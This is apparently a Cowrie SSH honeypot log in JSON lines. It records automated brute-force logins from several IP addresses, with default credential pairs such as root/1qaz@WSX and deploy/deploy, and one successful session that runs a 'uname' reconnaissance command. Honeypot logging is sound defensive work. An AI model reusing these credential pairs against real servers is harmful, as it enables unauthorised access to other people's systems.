{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:44:11.119479Z","src_ip":"45.125.211.194","session":"5925dfc22939"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam123","message":"login attempt [steam/steam123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:44:11.947917Z","src_ip":"45.125.211.194","session":"5925dfc22939"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:44:13.158610Z","src_ip":"45.125.211.194","session":"5925dfc22939"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":47034,"dst_ip":"1.2.3.4","dst_port":22,"session":"74d6db394141","protocol":"ssh","message":"New connection: 45.125.211.194:47034 (1.2.3.4:22) [session: 74d6db394141]","sensor":"my-vps","timestamp":"2025-08-28T03:44:25.780111Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:44:25.793750Z","src_ip":"45.125.211.194","session":"74d6db394141"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:44:25.990894Z","src_ip":"45.125.211.194","session":"74d6db394141"}
{"eventid":"cowrie.login.failed","username":"es","password":"es","message":"login attempt [es/es] failed","sensor":"my-vps","timestamp":"2025-08-28T03:44:26.828381Z","src_ip":"45.125.211.194","session":"74d6db394141"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:44:28.040738Z","src_ip":"45.125.211.194","session":"74d6db394141"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":31361,"dst_ip":"1.2.3.4","dst_port":22,"session":"eae51eac1a73","protocol":"ssh","message":"New connection: 45.125.211.194:31361 (1.2.3.4:22) [session: eae51eac1a73]","sensor":"my-vps","timestamp":"2025-08-28T03:44:40.616388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:44:40.631130Z","src_ip":"45.125.211.194","session":"eae51eac1a73"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:44:40.831803Z","src_ip":"45.125.211.194","session":"eae51eac1a73"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX","message":"login attempt [root/1qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:44:41.666082Z","src_ip":"45.125.211.194","session":"eae51eac1a73"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:44:42.104942Z","src_ip":"45.125.211.194","session":"eae51eac1a73"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:44:42.105711Z","src_ip":"45.125.211.194","session":"eae51eac1a73"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:44:42.316740Z","src_ip":"45.125.211.194","session":"eae51eac1a73"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:44:42.318094Z","src_ip":"45.125.211.194","session":"eae51eac1a73"}
{"eventid":"cowrie.session.connect","src_ip":"195.178.110.224","src_port":48346,"dst_ip":"1.2.3.4","dst_port":22,"session":"583b599c0b43","protocol":"ssh","message":"New connection: 195.178.110.224:48346 (1.2.3.4:22) [session: 583b599c0b43]","sensor":"my-vps","timestamp":"2025-08-28T03:44:52.700190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:44:52.701514Z","src_ip":"195.178.110.224","session":"583b599c0b43"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T03:44:52.721006Z","src_ip":"195.178.110.224","session":"583b599c0b43"}
{"eventid":"cowrie.login.failed","username":"sol","password":"sol","message":"login attempt [sol/sol] failed","sensor":"my-vps","timestamp":"2025-08-28T03:44:52.780955Z","src_ip":"195.178.110.224","session":"583b599c0b43"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:44:53.802884Z","src_ip":"195.178.110.224","session":"583b599c0b43"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":45800,"dst_ip":"1.2.3.4","dst_port":22,"session":"d219f6fd5291","protocol":"ssh","message":"New connection: 45.125.211.194:45800 (1.2.3.4:22) [session: d219f6fd5291]","sensor":"my-vps","timestamp":"2025-08-28T03:44:55.447641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:44:55.459642Z","src_ip":"45.125.211.194","session":"d219f6fd5291"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:44:55.683550Z","src_ip":"45.125.211.194","session":"d219f6fd5291"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-28T03:44:56.489068Z","src_ip":"45.125.211.194","session":"d219f6fd5291"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:44:57.699563Z","src_ip":"45.125.211.194","session":"d219f6fd5291"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":60134,"dst_ip":"1.2.3.4","dst_port":22,"session":"81284c5a5243","protocol":"ssh","message":"New connection: 45.125.211.194:60134 (1.2.3.4:22) [session: 81284c5a5243]","sensor":"my-vps","timestamp":"2025-08-28T03:45:10.407861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:45:10.434237Z","src_ip":"45.125.211.194","session":"81284c5a5243"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:45:10.617895Z","src_ip":"45.125.211.194","session":"81284c5a5243"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-28T03:45:11.463341Z","src_ip":"45.125.211.194","session":"81284c5a5243"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:45:12.675345Z","src_ip":"45.125.211.194","session":"81284c5a5243"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.240.46","src_port":58592,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad6c3972c743","protocol":"ssh","message":"New connection: 77.83.240.46:58592 (1.2.3.4:22) [session: ad6c3972c743]","sensor":"my-vps","timestamp":"2025-08-28T03:45:14.577228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:45:14.578225Z","src_ip":"77.83.240.46","session":"ad6c3972c743"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T03:45:14.605781Z","src_ip":"77.83.240.46","session":"ad6c3972c743"}
{"eventid":"cowrie.login.failed","username":"loginuser","password":"sophos","message":"login attempt [loginuser/sophos] failed","sensor":"my-vps","timestamp":"2025-08-28T03:45:14.663832Z","src_ip":"77.83.240.46","session":"ad6c3972c743"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:45:15.680629Z","src_ip":"77.83.240.46","session":"ad6c3972c743"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":60206,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cb8590edc02","protocol":"ssh","message":"New connection: 194.233.79.134:60206 (1.2.3.4:22) [session: 7cb8590edc02]","sensor":"my-vps","timestamp":"2025-08-28T03:45:21.244014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:45:21.410414Z","src_ip":"194.233.79.134","session":"7cb8590edc02"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:45:21.496560Z","src_ip":"194.233.79.134","session":"7cb8590edc02"}
{"eventid":"cowrie.login.failed","username":"rabbitmq","password":"rabbitmq","message":"login attempt [rabbitmq/rabbitmq] failed","sensor":"my-vps","timestamp":"2025-08-28T03:45:22.567029Z","src_ip":"194.233.79.134","session":"7cb8590edc02"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:45:23.919340Z","src_ip":"194.233.79.134","session":"7cb8590edc02"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":21608,"dst_ip":"1.2.3.4","dst_port":22,"session":"efda44d5d6f5","protocol":"ssh","message":"New connection: 45.125.211.194:21608 (1.2.3.4:22) [session: efda44d5d6f5]","sensor":"my-vps","timestamp":"2025-08-28T03:45:25.135655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:45:25.146310Z","src_ip":"45.125.211.194","session":"efda44d5d6f5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:45:25.346071Z","src_ip":"45.125.211.194","session":"efda44d5d6f5"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:45:26.182259Z","src_ip":"45.125.211.194","session":"efda44d5d6f5"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:45:27.394450Z","src_ip":"45.125.211.194","session":"efda44d5d6f5"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":48482,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c18114f858b","protocol":"ssh","message":"New connection: 45.125.211.194:48482 (1.2.3.4:22) [session: 7c18114f858b]","sensor":"my-vps","timestamp":"2025-08-28T03:45:40.124562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:45:40.125463Z","src_ip":"45.125.211.194","session":"7c18114f858b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:45:40.336649Z","src_ip":"45.125.211.194","session":"7c18114f858b"}
